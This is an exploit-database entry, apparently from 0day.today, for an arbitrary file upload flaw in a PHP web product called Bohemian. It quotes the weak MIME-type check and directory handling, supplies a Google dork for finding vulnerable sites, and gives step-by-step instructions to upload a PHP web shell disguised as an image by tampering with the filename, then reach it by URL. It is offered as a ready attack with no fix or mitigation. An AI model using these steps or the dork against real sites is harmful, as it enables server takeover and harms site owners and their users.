Bohemian Arbitary File Upload vulnerability

2013-02-08T00:00:00
ID 1337DAY-ID-20321
Type zdt
Reporter NEt_bomber
Modified 2013-02-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ####################################################################################################################
### Exploit Title: "Bohemian Arbitary File Upload
### Author: NEt_Bomber
### Contact: http://facebook.com/net.bomba
### Software Link: http://bohemiawebsites.com/component/option,com_jdownloads/Itemid,382/cid,71/task,view.download/
### Google Dork:intext:"CURRENT FILES:" inurl:uploads.php
### Tested on: Linux/Windows
####################################################################################################################

#POC:

Allowed types:

" if (($_FILES[$myfile_uploadname]['type'] == "application/pdf" || $_FILES[$myfile_uploadname]['type'] == "application/vnd.openxmlformats-officedocument.wordprocessingml.document" || $_FILES[$myfile_uploadname]['type'] == "application/zip" || $_FILES[$myfile_uploadname]['type'] == "application/x-zip" || $_FILES[$myfile_uploadname]['type'] == "application/x-zip-compressed" || $_FILES[$myfile_uploadname]['type'] == "application/multipart/x-zip" || $_FILES[$myfile_uploadname]['type'] == "application/application/x-compress" || $_FILES[$myfile_uploadname]['type'] == "application/application/x-compressed" || $_FILES[$myfile_uploadname]['type'] == "application/application/octet-stream" || $_FILES[$myfile_uploadname]['type'] == "text/xml" || $_FILES[$myfile_uploadname]['type'] == "text/plain" || $_FILES[$myfile_uploadname]['type'] == "text/html" || $_FILES[$myfile_uploadname]['type'] == "text/css" || $_FILES[$myfile_uploadname]['type'] == "application/x-javascript" || $_FILES[$myfile_uploadname]['type'] == "image/jpeg" || $_FILES[$myfile_uploadname]['type'] == "image/pjpeg" || $_FILES[$myfile_uploadname]['type'] == "image/jpg" || $_FILES[$myfile_uploadname]['type'] == "image/pjpg" || $_FILES[$myfile_uploadname]['type'] == "image/gif" || $_FILES[$myfile_uploadname]['type'] == "image/x-png" ) && ($_FILES["image_upload_box"]["size"] < 1100000)){ "

Upload:

"if (move_uploaded_file($_FILES[$myfile_uploadname]['tmp_name'], "$directory/$name")) { ....."

#EXPLOIT

Upload ur shell.php.jpg than tamper filename with TamperData so u complete dataPost with PHP extension :D

U can specify Upload folder ===> "if($_POST['dir']) { $directory = $_POST['dir'];"

Or just leave the form blank n it'll upload it to current directory(recommended) ====> " else { $directory= getcwd();}" 

when its finished go back to uploader n ur shellname.php will show up in Files list below the uploader ======> 

$files1 = scandir($dir);
foreach($files1 as $file){
if(strlen($file) >=3){
$foil = strstr($file, 'css'); // As of PHP 5.3.0
//$pos = strpos($file, 'css');
//if ($foil==true){
echo $file."<br/>";

Then just go to uploader url : http://$host/$path/shellname.php and u got ur shell ;) 

#Demo :
http://data.imagup.com/10/1174922149.JPG

Done!

#  0day.today [2018-01-09]  #